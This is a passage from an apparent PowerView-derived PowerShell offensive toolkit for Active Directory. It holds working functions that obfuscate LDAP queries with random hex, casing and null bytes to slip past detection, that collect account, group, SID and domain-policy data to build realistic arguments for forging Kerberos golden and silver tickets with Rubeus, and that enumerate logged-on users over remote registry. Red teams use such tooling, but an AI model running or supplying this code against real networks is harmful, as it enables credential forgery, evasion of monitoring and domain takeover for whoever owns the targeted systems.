($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }\n        if ($PSBoundParameters['Owner']) { $SearcherArguments['SecurityMasks'] = 'Owner' }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['Obfuscate']) {\n            $LDAPFilter = Get-ObfuscatedFilterString -LDAPFilter $LDAPFilter\n        }\n        if ($PSBoundParameters['SSL']) {\n            $MaxResultsToRequest = 1000\n            $Results = @()\n            $Searcher = Get-DomainSearcher @SearcherArguments -SSL\n\n            $Request = New-Object -TypeName System.DirectoryServices.Protocols.SearchRequest\n            $PageRequestControl = New-Object -TypeName System.DirectoryServices.Protocols.PageResultRequestControl -ArgumentList $MaxResultsToRequest\n\n            # for returning ntsecuritydescriptor\n            if ($PSBoundParameters['SecurityMasks']) {\n                $SDFlagsControl = New-Object -TypeName System.DirectoryServices.Protocols.SecurityDescriptorFlagControl -ArgumentList $SecurityMasks\n                $Request.Controls.Add($SDFlagsControl)\n            }\n\n            if ($PSBoundParameters['SearchBase']) {\n                $Request.DistinguishedName = $SearchBase\n            }\n            else {\n                $TargetDomain = $Searcher.SessionOptions.DomainName\n                $DomainDN = \"DC=$($TargetDomain.Replace('.',',DC='))\"\n                $Request.DistinguishedName = $DomainDN\n            }\n            if ($PSBoundParameters['SearchScope']) {\n                $Request.Scope = $SearchScope\n            }\n            $Request.Controls.Add($PageRequestControl)\n            if ($LdapFilter -and $LdapFilter -ne '') {\n                $Request.Filter = \"$LdapFilter\"\n            }\n\n            while($true) {\n                $Response = $Searcher.SendRequest($Request)\n                if ($Response.ResultCode -eq 'Success') {\n                    foreach ($entry in $response.Entries) {\n                        $Results += $entry\n                        if ($PSBoundParameters['FindOne']) {\n                            break\n                        }\n                    }\n                }\n                if ($PSBoundParameters['FindOne']) {\n                    break\n                }\n\n                $PageResponseControl = [System.DirectoryServices.Protocols.PageResultResponseControl]$Response.Controls[0]\n                if ($PageResponseControl.Cookie.Length -eq 0) {\n                    break\n                }\n                $PageRequestControl.Cookie = $PageResponseControl.Cookie\n            }\n        }\n        else {\n            $Searcher = Get-DomainSearcher @SearcherArguments\n            $Searcher.filter = \"$LDAPFilter\"\n            Write-Verbose \"[Invoke-LDAPQuery] filter string: $($Searcher.filter)\"\n\n            if ($PSBoundParameters['FindOne']) { $Results = $Searcher.FindOne() }\n            else { $Results = $Searcher.FindAll() }\n        }\n        $Results\n    }\n}\n\nfunction Get-ObfuscatedFilterString {\n<#\n.SYNOPSIS\n\nRandomly obfuscate LDAP filter string with random hex characters, randomised casing and random null bytes.\n\nAuthor: Charlie Clark (@exploitph)\nLicense: BSD 3-Clause\nRequired Dependencies: \n\n.DESCRIPTION\n\nRandomly obfuscate LDAP filter string with random hex characters, randomised casing and random null bytes.\n\n.PARAMETER LDAPFilter\n\n.EXAMPLE\n\nGet-ObfuscatedFilterString -LDAPFilter \"(samaccounttype=805306368)\"\n\n.INPUTS\n\nString\n\n.OUTPUTS\n\nString\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('String')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True)]\n        [ValidateNotNullOrEmpty()]\n        $LDAPFilter\n    )\n\n    $AvoidNops = @(\n        \"samaccounttype\",\n        \"pwdlastset\",\n        \"objectclass\",\n        \"objectcategory\",\n        \"serviceprincipalname\"\n    )\n    $AvoidHex = @(\n        \"useraccountcontrol\"\n    )\n    $Nops = @(\"\\00\")\n    foreach ($i in 128..255) {$Nops += '\\{0:x}' -f $i}\n\n    Write-Verbose \"[Get-ObfuscatedFilterString] Obfuscating filter string: $($LDAPFilter)\"\n    $Parts = $LDAPFilter -split '='\n    $OutFilter = \"\"\n    if ($Parts[0].IndexOf('(') -ne -1) {\n        $LastAttribute = $Parts[0].ToLower().Split('(')[-1].Trim('<').Trim('>')\n    }\n    else {\n        $LastAttribute = $Parts[0].ToLower().Trim('<').Trim('>')\n    }\n    $Include = Get-RandomizedCasing -InputString $Parts[0]\n    if ((Get-Random -Maximum 2) -and (($Include -notmatch ':') -and ($Include -notmatch '<') -and ($Include -notmatch '>'))) {\n        $OutFilter += \"$($Include)~=\"\n    }\n    else {\n        $OutFilter += \"$($Include)=\"\n    }\n    $Skip = $False\n    foreach ($Item in $AvoidHex) {if ($Parts[0].ToLower() -match $Item) {$Skip = $True}}\n    for ($i=1; $i -lt $Parts.Length; $i++) {\n        if ($Skip) {\n            if ($i -eq $Parts.Length - 1) {\n                $OutFilter += \"$($Parts[$i])\"\n            }\n            else {\n                $Check = 0\n                $LastAttribute = $Parts[$i].SubString($Parts[$i].IndexOf('(') + 1).Trim('<').Trim('>').ToLower()\n                foreach ($Item in $AvoidHex) {if ($LastAttribute -notmatch $Item) {$Check += 1}}\n                if ($Check -eq $AvoidHex.Count) {\n                    $Skip = $False\n                }\n                $Include = Get-RandomizedCasing -InputString $Parts[$i]\n                if ((Get-Random -Maximum 2) -and (($Include -notmatch ':') -and ($Include -notmatch '<') -and ($Include -notmatch '>'))) {\n                    $OutFilter += \"$($Include)~=\"\n                }\n                else {\n                    $OutFilter += \"$($Include)=\"\n                }\n            }\n\n        }\n        else {\n            if ($Parts[$i].IndexOf(')') -ne -1) {\n                $Value = $Parts[$i].SubString(0,$Parts[$i].IndexOf(')'))\n            }\n            else {\n                $Value = $Parts[$i]\n            }\n            if ($Value.Length -gt 1) {\n                if (($Value -match '\\*') -and ($OutFilter.substring($OutFilter.Length - 2, 1) -eq '~')) {\n                    $OutFilter = $OutFilter.substring(0, $OutFilter.Length - 2) + '='\n                }\n                $OutValueHash = @{}\n                $Value = Get-RandomizedCasing -InputString $Value\n                for ($c=0; $c -lt (Get-Random -Maximum $($Value.Length) -Minimum 1); $c++) {\n                    $Index = Get-Random -Maximum $($Value.Length - 1)\n                    if (($OutValueHash.keys | Measure-Object).Count -ne 0) {\n                        if ($OutValueHash.keys -contains $Index) {\n                            Do\n                            {\n                                $Index = Get-Random -Maximum $($Value.Length - 1)\n                            } While ($OutValueHash.keys -contains $Index)\n                        }\n                    }\n                    if ($Value[$Index] -ne '*') {\n                        $OutValueHash[$Index] = '\\{0:x}' -f [System.Convert]::ToUInt32($Value[$Index])\n                    }\n                }\n                for ($c=0; $c -lt $Value.Length; $c++) {\n                    if ((Get-Random -Maximum 2) -and ($AvoidNops -notcontains $LastAttribute)) {\n                        $OutFilter += $Nops[(Get-Random -Maximum $Nops.Length)]\n                    }\n                    if ($OutValueHash.keys -contains $c) {\n                        $OutFilter += \"$($OutValueHash[$c])\"\n                    }\n                    else {\n                        $OutFilter += \"$($Value[$c])\"\n                    }\n                }\n                if ((Get-Random -Maximum 2) -and ($AvoidNops -notcontains $LastAttribute)) {\n                    $OutFilter += $Nops[(Get-Random -Maximum $Nops.Length)]\n                }\n            }\n            else {\n                if (($Value -eq '*') -and ($OutFilter.substring($OutFilter.Length - 2, 1) -eq '~')) {\n                    $OutFilter = $OutFilter.substring(0, $OutFilter.Length - 2) + '='\n                }\n                $OutFilter += \"$($Value)\"\n            }\n            if ($Parts[$i].IndexOf(')') -ne -1) {\n                $Next = $Parts[$i].SubString($Parts[$i].IndexOf(')'))\n                if ($i -eq $Parts.Length - 1) {\n                    $OutFilter += \"$($Next)\"\n                }\n                else {\n                    $Include = Get-RandomizedCasing -InputString $Next\n                    if ((Get-Random -Maximum 2) -and (($Include -notmatch ':') -and ($Include -notmatch '<') -and ($Include -notmatch '>'))) {\n                        $OutFilter += \"$($Include)~=\"\n                    }\n                    else {\n                        $OutFilter += \"$($Include)=\"\n                    }\n                }\n                foreach ($Item in $AvoidHex) {if ($Next.ToLower() -match $Item) {$Skip = $True}}\n                if ($Next.IndexOf('(') -ne -1) {\n                    $LastAttribute = $Next.ToLower().Split('(')[-1].Trim('<').Trim('>')\n                }\n                else {\n                    $LastAttribute = $Next.ToLower().Trim('<').Trim('>')\n                }\n            }\n            else {\n                if (Get-Random -Maximum 2) {\n                    $OutFilter += \"=\"\n                }\n                else {\n                    $OutFilter += '\\3d'\n                }\n            }\n        }\n    }\n\n    Write-Verbose \"[Get-ObfuscatedFilterString] Filter string obfuscated: $($OutFilter)\"\n    $OutFilter\n}\n\nfunction Get-RandomizedCasing {\n<#\n.SYNOPSIS\n\nRandomize casing for provided string.\n\nAuthor: Charlie Clark (@exploitph)\nLicense: BSD 3-Clause\nRequired Dependencies: \n\n.DESCRIPTION\n\nRandomize casing for provided string.\n\n.PARAMETER InputString\n\nInput string.\n\n.EXAMPLE\n\nGet-RandomizedCasing -InputString \"testString\"\n\n.INPUTS\n\nString\n\n.OUTPUTS\n\nString\n#>\n\n    [OutputType([PSObject])]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $InputString\n    )\n\n    $NewValue = \"\"\n    foreach ($c in $InputString.ToCharArray()) {\n        if ($c -in 'abcdefghijklmnopqrstuvwxyz'.ToCharArray()) {\n            if (Get-Random -Maximum 2) {\n                $NewValue += $c.ToString().ToUpper()\n            }\n            else {\n                $NewValue += $c\n            }\n        }\n        elseif ($c -in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'.ToCharArray()) {\n            if (Get-Random -Maximum 2) {\n                $NewValue += $c.ToString().ToLower()\n            }\n            else {\n                $NewValue += $c\n            }\n        }\n        else {\n            $NewValue += $c\n        }\n    }\n    $NewValue\n}\n\nfunction Convert-LogonHours {\n<#\n.SYNOPSIS\n\nConvert logonhours LDAP attribute from byte array to readable string.\n\nAuthor: Charlie Clark (@exploitph)\nLicense: BSD 3-Clause\nRequired Dependencies: \n\n.DESCRIPTION\n\nConvert logonhours LDAP attribute from byte array to readable string.\n\n.PARAMETER LogonHours\n\nByte array of the users logon hours.\n\n.EXAMPLE\n\nConvert-LogonHours -LogonHours $LogonHours\n\n.INPUTS\n\nByte[]\n\n.OUTPUTS\n\nPSObject\n#>\n    [OutputType([PSObject])]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Mandatory = $True, ValueFromPipeline = $True)]\n        [ValidateNotNullOrEmpty()]\n        $LogonHours\n    )\n\n    BEGIN {\n        $Days = @{\n            0 = \"Sunday\";\n            1 = \"Sunday\";\n            2 = \"Sunday\";\n            3 = \"Monday\";\n            4 = \"Monday\";\n            5 = \"Monday\";\n            6 = \"Tuesday\";\n            7 = \"Tuesday\";\n            8 = \"Tuesday\";\n            9 = \"Wednesday\";\n            10 = \"Wednesday\";\n            11 = \"Wednesday\";\n            12 = \"Thursday\";\n            13 = \"Thursday\";\n            14 = \"Thursday\";\n            15 = \"Friday\";\n            16 = \"Friday\";\n            17 = \"Friday\";\n            18 = \"Saturday\";\n            19 = \"Saturday\";\n            20 = \"Saturday\";\n        }\n\n        $Hours = @{\n            0 = 1;\n            1 = 2;\n            2 = 4;\n            3 = 8;\n            4 = 16;\n            5 = 32;\n            6 = 64;\n            7 = 128;\n        }\n\n        $OutObject = New-Object PSObject -Property @{\n            \"Monday\" = @{};\n            \"Tuesday\" = @{};\n            \"Wednesday\" = @{};\n            \"Thursday\" = @{};\n            \"Friday\" = @{};\n            \"Saturday\" = @{};\n            \"Sunday\" = @{};\n        }\n    }\n\n    PROCESS {\n        $ByteCounter = 0\n        $DayCounter = 0\n\n        foreach ($byte in $LogonHours) {\n            foreach ($bit in $Hours.Keys) {\n                $Permitted = $false\n                if ($byte -band $Hours[$bit]) {\n                    $Permitted = $true\n                }\n                $hour = $ByteCounter * 8 + $bit\n                $day = $Days[$DayCounter]\n                $OutObject.$day[$hour] = $Permitted\n            }\n            $ByteCounter += 1\n            if ($ByteCounter -eq 3) {\n                $ByteCounter = 0\n            }\n            $DayCounter += 1\n        }\n\n        $OutObject\n    }\n}\n\nfunction Get-RubeusForgeryArgs {\n<#\n.SYNOPSIS\n\nReturn a string containing the arguments required to forge a valid ticket with Rubeus' golden and silver commands.\n\nAuthor: Charlie Clark (@exploitph)\nLicense: BSD 3-Clause\nRequired Dependencies: \n\n.DESCRIPTION\n\nReturn a string containing the arguments required to forge a valid ticket with Rubeus' golden and silver commands.\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. WINDOWS10$), DistinguishedName (e.g. CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g. 4f16b6bc-7010-4cbf-b628-f3cfe20f6994),\nor a dns host name (e.g. windows10.testlab.local). Wildcards accepted.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER SSL\n\nSwitch. Use SSL for the connection to the LDAP server.\n\n.PARAMETER Obfuscate\n\nSwitch. Obfuscate the resulting LDAP filter string using hex encoding.\n\n.EXAMPLE\n\nGet-RubeusForgeryArgs exploitph\n\n.INPUTS\n\nString\n\n.OUTPUTS\n\nString\n\n#>\n    [OutputType('String')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('SamAccountName', 'Name', 'DNSHostName')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $SSL,\n\n        [Switch]\n        $Obfuscate\n    )\n\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n        if ($PSBoundParameters['SSL']) { $SearcherArguments['SSL'] = $SSL }\n        if ($PSBoundParameters['Obfuscate']) {$SearcherArguments['Obfuscate'] = $Obfuscate }\n\n        $ForestArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n    }\n\n    PROCESS {\n        $Filter = ''\n        $Identity | Get-IdentityFilterString | ForEach-Object {\n            $Filter += $_\n        }\n        if (-not $Filter -or $Filter -eq '') {\n            Write-Error \"[Get-RubeusForgeryArgs] Identity argument is required!\"\n            return\n        }\n        # get policy objects first\n        $DomainPolicy = Get-DomainPolicy -Policy Domain @SearcherArguments\n        \n\n        Write-Verbose \"[Get-RubeusForgeryArgs] filter string: (|$Filter)\"\n        $Results = Invoke-LDAPQuery @SearcherArguments -LDAPFilter \"(|$Filter)\"\n        $Results | Where-Object {$_} | ForEach-Object {\n            $OutArguments = ''\n            if (Get-Member -inputobject $_ -name \"Attributes\" -Membertype Properties) {\n                $Prop = @{}\n                foreach ($a in $_.Attributes.Keys | Sort-Object) {\n                    if (($a -eq 'objectsid') -or ($a -eq 'sidhistory') -or ($a -eq 'objectguid') -or ($a -eq 'usercertificate') -or ($a -eq 'ntsecuritydescriptor') -or ($a -eq 'logonhours')) {\n                        $Prop[$a] = $_.Attributes[$a]\n                    }\n                    else {\n                        $Values = @()\n                        foreach ($v in $_.Attributes[$a].GetValues([byte[]])) {\n                            $Values += [System.Text.Encoding]::UTF8.GetString($v)\n                        }\n                        $Prop[$a] = $Values\n                    }\n                }\n            }\n            else {\n                $Prop = $_.Properties\n            }\n\n            $Account = Convert-LDAPProperty -Properties $Prop\n            $Account.PSObject.TypeNames.Insert(0, 'PowerView.Account')\n\n            # extract the account id and domain sid\n            $AccountID = $Account.objectsid.Substring($Account.objectsid.LastIndexOf('-')+1)\n            $DomainSID = $Account.objectsid.Substring(0, $Account.objectsid.LastIndexOf('-'))\n\n            # get groups\n            $GroupFilter = ''\n            foreach ($group in $Account.memberof) {\n                $GroupFilter += \"(distinguishedname=$group)\"\n            }\n            $Groups = @()\n            if ($GroupFilter) {\n                $GroupFilter = \"(|$GroupFilter)\"\n                Write-Verbose \"[Get-RubeusForgeryArgs] filter string: $GroupFilter\"\n\n                $Results = Invoke-LDAPQuery @SearcherArguments -LDAPFilter \"$GroupFilter\"\n                $Results | Where-Object {$_} | ForEach-Object {\n                    if (Get-Member -inputobject $_ -name \"Attributes\" -Membertype Properties) {\n                        $Prop = @{}\n                        foreach ($a in $_.Attributes.Keys | Sort-Object) {\n                            if (($a -eq 'objectsid') -or ($a -eq 'sidhistory') -or ($a -eq 'objectguid') -or ($a -eq 'usercertificate') -or ($a -eq 'ntsecuritydescriptor') -or ($a -eq 'logonhours')) {\n                                $Prop[$a] = $_.Attributes[$a]\n                            }\n                            else {\n                                $Values = @()\n                                foreach ($v in $_.Attributes[$a].GetValues([byte[]])) {\n                                    $Values += [System.Text.Encoding]::UTF8.GetString($v)\n                                }\n                                $Prop[$a] = $Values\n                            }\n                        }\n                    }\n                    else {\n                        $Prop = $_.Properties\n                    }\n\n                    $GroupObject = Convert-LDAPProperty -Properties $Prop\n                    $GroupID = $GroupObject.objectsid.Substring($GroupObject.objectsid.LastIndexOf('-')+1)\n                    $Groups += $GroupID\n                }\n            }\n\n            # get netbios name\n            $DomainObject = Get-Domain @ForestArguments\n            $Domain = $DomainObject.Name\n            $Forest = $DomainObject.Forest\n\n            $ForestDN = \"DC=$($Forest -replace '\\.',',DC=')\"\n            $ConfigDN = \"CN=Configuration,$ForestDN\"\n            $NetbiosFilter = \"(&(netbiosname=*)(dnsroot=$Domain))\"\n            $NetbiosName = (Get-DomainObject -SearchBase \"$ConfigDN\" -LdapFilter \"$NetbiosFilter\" @SearcherArguments).netbiosname\n\n            # get time now for logontime and logofftime\n            $Now = Get-Date\n\n            # we have everything we can start to build the arguments\n            $OutArguments = \"/user:$($Account.samaccountname) /id:$AccountID /sid:$DomainSID /netbios:$NetbiosName /dc:$($DomainObject.DomainControllers[0].Name) /domain:$Domain /pgid:$($Account.primarygroupid) /displayname:\"\"$($Account.displayname)\"\" /logoncount:$($Account.logoncount) /badpwdcount:$($Account.badpwdcount) /pwdlastset:\"\"$($Account.pwdlastset.ToString())\"\" /lastlogon:\"\"$($Now.AddSeconds(-$(Get-Random -Maximum 10)).ToString())\"\"\"\n            if ($Account.useraccountcontrol -ne \"NORMAL_ACCOUNT\") {\n                $OutArguments += \" /uac:$($Account.useraccountcontrol -replace ' ','')\"\n            }\n            if ($Groups.Length -gt 0) {\n                $OutArguments += \" /groups:$($Groups -join ',')\"\n            }\n            if ($Account.scriptpath) {\n                $OutArguments += \" /scriptpath:\"\"$($Account.scriptpath)\"\"\" \n            }\n            if ($Account.profilepath) {\n                $OutArguments += \" /profilepath:\"\"$($Account.profilepath)\"\"\" \n            }\n            if ($Account.homedrive) {\n                $OutArguments += \" /homedrive:\"\"$($Account.homedrive)\"\"\" \n            }\n            if ($Account.homedirectory) {\n                $OutArguments += \" /homedir:\"\"$($Account.homedirectory)\"\"\" \n            }\n            if ($Account.logonhours) {\n                $LogoffTime = Get-LogoffTime -LogonHours $Account.logonhours -LogonTime $Now\n                if ($LogoffTime -and $LogoffTime -ne $Now) {\n                    $OutArguments += \" /logofftime:\"\"$($LogoffTime.AddMinutes(-$LogoffTime.Minute).AddSeconds(-$LogoffTime.Second).ToString())\"\"\"\n                }\n            }\n            elseif ($LogoffTime -eq $Now) {\n                Write-Warning \"[Get-RubeusForgeryArgs] User is not allowed to login now!\"\n            }\n            if ($DomainPolicy.SystemAccess.MinimumPasswordAge -gt 0) {\n                $OutArguments += \" /minpassage:$($DomainPolicy.SystemAccess.MinimumPasswordAge)\"\n            }\n            # only set PasswordMustChange if policy is set to expire password and user isn't configured so password doesn't expire\n            if ($DomainPolicy.SystemAccess.MaximumPasswordAge -gt 0 -and $Account.useraccountcontrol -notmatch \"DONT_EXPIRE_PASSWORD\") {\n                $OutArguments += \" /maxpassage:$($DomainPolicy.SystemAccess.MaximumPasswordAge)\"\n            }\n            # in Protected Users group with time endtime and renewtill of 240 minutes\n            if ($Groups.Contains(\"525\")) {\n                $OutArguments += \" /endtime:240m /renewtill:240m\"\n            }\n            else {\n                if ($DomainPolicy.KerberosPolicy.MaxTicketAge -ne 10) {\n                    $OutArguments += \" /endtime:$($DomainPolicy.KerberosPolicy.MaxTicketAge)h\"\n                }\n                if ($DomainPolicy.KerberosPolicy.MaxRenewAge -ne 7) {\n                    $OutArguments += \" /renewtill:$($DomainPolicy.KerberosPolicy.MaxRenewAge)d\"\n                }\n            }\n\n            $OutArguments\n        }\n    }\n}\n\nfunction Get-LogoffTime {\n<#\n.SYNOPSIS\n\nCalculate the proper logoff time for a user given the logonhours field and the current time.\n\nAuthor: Charlie Clark (@exploitph)\nLicense: BSD 3-Clause\nRequired Dependencies: \n\n.DESCRIPTION\n\nCalculate the proper logoff time for a user given the logonhours field and the current time.\n\n.PARAMETER LogonHours\n\nLogon hours object output by Convert-LogonHours\n\n.PARAMETER LogonTime\n\nLogon time for ticket\n\n.EXAMPLE\n\nGet-LogoffTime -LogonHours $LogonHours -LogonTime $(Get-Date)\n\n.INPUTS\n\nPSObject\n\n.OUTPUTS\n\nDateTime\n#>\n    [OutputType([DateTime])]\n    [CmdletBinding()]\n    Param(\n        [ValidateNotNullOrEmpty()]\n        $LogonHours,\n\n        [DateTime]\n        $LogonTime\n    )\n\n    BEGIN {\n        $Days = @{\n            1 = \"Sunday\";\n            2 = \"Monday\";\n            3 = \"Tuesday\";\n            4 = \"Wednesday\";\n            5 = \"Thursday\";\n            6 = \"Friday\";\n            7 = \"Saturday\";\n        }\n    }\n\n    PROCESS {\n        $Hour = $LogonTime.Hour\n        $Day = $Days[$LogonTime.Day]\n        if (-not $LogonHours.$Day.$Hour) {\n            Write-Verbose \"[Get-LogoffTime] User is not allowed to logon now!\"\n            $LogonTime\n        }\n        $OutTime = $LogonTime\n        $leftover = 23 - $Hour\n        $FoundLogoff = $False\n        for ($i=0; $i -lt 7; $i++) {\n            $Day = $Days[$($LogonTime.Day + $i)]\n            if ($i -eq 0) {\n                $counter = $Hour + 1\n            }\n            else {\n                $counter = 0\n            }\n            do {\n                $OutTime = $OutTime.AddHours(1)\n                if (-not $LogonHours.$Day.$counter) {\n                    $FoundLogoff = $True\n                    break\n                }\n                $counter += 1\n            } while ($counter -lt 24)\n            if ($FoundLogoff) {\n                break\n            }\n        }\n\n        if (-not $FoundLogoff -and $Hour -gt 0) {\n            $Day = $Days[$LogonTime.Day]\n            for ($i=0; $i -lt $Hour; $i++) {\n                $OutTime = $OutTime.AddHours(1)\n                if (-not $LogonHours.$Day.$i) {\n                    $FoundLogoff = $True\n                    break\n                }\n            }\n        }\n\n        if ($FoundLogoff) {\n            $OutTime\n        }\n        else {\n            $FoundLogoff\n        }\n    }\n}\n\nfunction Get-RegistryUserEnum {\n<#\n.SYNOPSIS\n\nEnumerate users using remote registry.\n\nAuthor: Charlie Clark (@exploitph)\nLicense: BSD 3-Clause\nRequired Dependencies: \n\n.DESCRIPTION\n\nEnumerate users using remote registry.\n\n.PARAMETER ComputerName\n\nComputer to check.\n\n.PARAMETER Check\n\nSwitch. Just check if connecting to the remote registry works.\n\n.EXAMPLE\n\nGet-LogoffTime -LogonHours $LogonHours -LogonTime $(Get-Date)\n\n.INPUTS\n\nPSObject\n\n.OUTPUTS\n\nDateTime\n#>\n\n    [CmdletBinding(SupportsShouldProcess=$True,\n        ConfirmImpact='Medium')]\n    Param\n    ( \n        [parameter(Position=0, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]\n        [Alias('DNSHostName', 'Name', 'Server')]\n        [String[]]\n        $ComputerName = '.',\n\n        [Switch]\n        $Check\n    )\n    Begin {\n    }\n    Process {\n        Foreach ($Computer in $ComputerName) {\n            if (Test-Connection $computer -Count 2 -Quiet) {\n                $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', $Computer)\n                $subkeys = $reg.GetSubKeyNames() | ?{$_ -notmatch '.DEFAULT' -and $_ -notmatch '_Classes'}\n                if ($PSBoundParameters['Check'] -and $subkeys.Length -gt 0) {\n                    $Computer\n                } elseif ($subkeys.Length -gt 0) {\n                $users = @()\n                foreach ($subkey in $subkeys) {\n                    $user = New-Object psobject\n                    $user | Add-Member -Name SID -MemberType NoteProperty -Value $subkey\n                    $user | Add-Member -Name Name -MemberType NoteProperty -Value (ConvertFrom-SID $subkey)\n                    $users += ,$user\n                }\n                $Obj = New-Object psobject\n                $Obj | Add-Member -Name Computer -MemberType NoteProperty -Value $Computer\n                $Obj | Add-Member -Name Users -MemberType NoteProperty -Value $users\n                $Obj\n                } else {\n                    Write-Warning \"$Computer connected but did not return subkeys\"\n                }\n            }\n            else {\n                Write-Error \"$Computer not reachable\"\n            }\n        }\n    }\n    End {\n        #[Microsoft.Win32.RegistryHive]::Users\n    }\n}\n\n\n\n########################################################\n#\n# Expose the Win32API functions and datastructures below\n# using PSReflect.\n# Warning: Once these are executed, they are baked in\n# and can't be changed while the script is running!\n#\n########################################################\n\n$Mod = New-InMemoryModule -ModuleName Win32\n\n# [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPositionalParameters', Scope='Function', Target='psenum')]\n\n# used to parse the 'samAccountType' property for users/computers/groups\n$SamAccountTypeEnum = psenum $Mod PowerView.SamAccountTypeEnum UInt32 @{\n    DOMAIN_OBJECT                   =   '0x00000000'\n    GROUP_OBJECT                    =   '0x10000000'\n    NON_SECURITY_GROUP_OBJECT       =   '0x10000001'\n    ALIAS_OBJECT                    =   '0x20000000'\n    NON_SECURITY_ALIAS_OBJECT       =   '0x20000001'\n    USER_OBJECT                     =   '0x30000000'\n    MACHINE_ACCOUNT                 =   '0x30000001'\n    TRUST_ACCOUNT                   =   '0x30000002'\n    APP_BASIC_GROUP                 =   '0x40000000'\n    APP_QUERY_GROUP                 =   '0x40000001'\n    ACCOUNT_TYPE_MAX                =   '0x7fffffff'\n}\n\n# used to parse the 'grouptype' property for groups\n$GroupTypeEnum = psenum $Mod PowerView.GroupTypeEnum UInt32 @{\n    CREATED_BY_SYSTEM               =   '0x00000001'\n    GLOBAL_SCOPE                    =   '0x00000002'\n    DOMAIN_LOCAL_SCOPE              =   '0x00000004'\n    UNIVERSAL_SCOPE                 =   '0x00000008'\n    APP_BASIC                       =   '0x00000010'\n    APP_QUERY                       =   '0x00000020'\n    SECURITY                        =   '0x80000000'\n} -Bitfield\n\n# used to parse the 'userAccountControl' property for users/groups\n$UACEnum = psenum $Mod PowerView.UACEnum UInt32 @{\n    SCRIPT                          =   1\n    ACCOUNTDISABLE                  =   2\n    HOMEDIR_REQUIRED                =   8\n    LOCKOUT                         =   16\n    PASSWD_NOTREQD                  =   32\n    PASSWD_CANT_CHANGE              =   64\n    ENCRYPTED_TEXT_PWD_ALLOWED      =   128\n    TEMP_DUPLICATE_ACCOUNT          =   256\n    NORMAL_ACCOUNT                  =   512\n    INTERDOMAIN_TRUST_ACCOUNT       =   2048\n    WORKSTATION_TRUST_ACCOUNT       =   4096\n    SERVER_TRUST_ACCOUNT            =   8192\n    DONT_EXPIRE_PASSWORD            =   65536\n    MNS_LOGON_ACCOUNT               =   131072\n    SMARTCARD_REQUIRED              =   262144\n    TRUSTED_FOR_DELEGATION          =   524288\n    NOT_DELEGATED                   =   1048576\n    USE_DES_KEY_ONLY                =   2097152\n    DONT_REQ_PREAUTH                =   4194304\n    PASSWORD_EXPIRED                =   8388608\n    TRUSTED_TO_AUTH_FOR_DELEGATION  =   16777216\n    NO_AUTH_DATA_REQUIRED           =   33554432\n    PARTIAL_SECRETS_ACCOUNT         =   67108864\n} -Bitfield\n\n# enum used by $WTS_SESSION_INFO_1 below\n$WTSConnectState = psenum $Mod WTS_CONNECTSTATE_CLASS UInt16 @{\n    Active       =    0\n    Connected    =    1\n    ConnectQuery =    2\n    Shadow       =    3\n    Disconnected =    4\n    Idle         =    5\n    Listen       =    6\n    Reset        =    7\n    Down         =    8\n    Init         =    9\n}\n\n# the WTSEnumerateSessionsEx result structure\n$WTS_SESSION_INFO_1 = struct $Mod PowerView.RDPSessionInfo @{\n    ExecEnvId = field 0 UInt32\n    State = field 1 $WTSConnectState\n    SessionId = field 2 UInt32\n    pSessionName = field 3 String -MarshalAs @('LPWStr')\n    pHostName = field 4 String -MarshalAs @('LPWStr')\n    pUserName = field 5 String -MarshalAs @('LPWStr')\n    pDomainName = field 6 String -MarshalAs @('LPWStr')\n    pFarmName = field 7 String -MarshalAs @('LPWStr')\n}\n\n# the particular WTSQuerySessionInformation result structure\n$WTS_CLIENT_ADDRESS = struct $mod WTS_CLIENT_ADDRESS @{\n    AddressFamily = field 0 UInt32\n    Address = field 1 Byte[] -MarshalAs @('ByValArray', 20)\n}\n\n# the NetShareEnum result structure\n$SHARE_INFO_1 = struct $Mod PowerView.ShareInfo @{\n    Name = field 0 String -MarshalAs @('LPWStr')\n    Type = field 1 UInt32\n    Remark = field 2 String -MarshalAs @('LPWStr')\n}\n\n# the NetWkstaUserEnum result structure\n$WKSTA_USER_INFO_1 = struct $Mod PowerView.LoggedOnUserInfo @{\n    UserName = field 0 String -MarshalAs @('LPWStr')\n    LogonDomain = field 1 String -MarshalAs @('LPWStr')\n    AuthDomains = field 2 String -MarshalAs @('LPWStr')\n    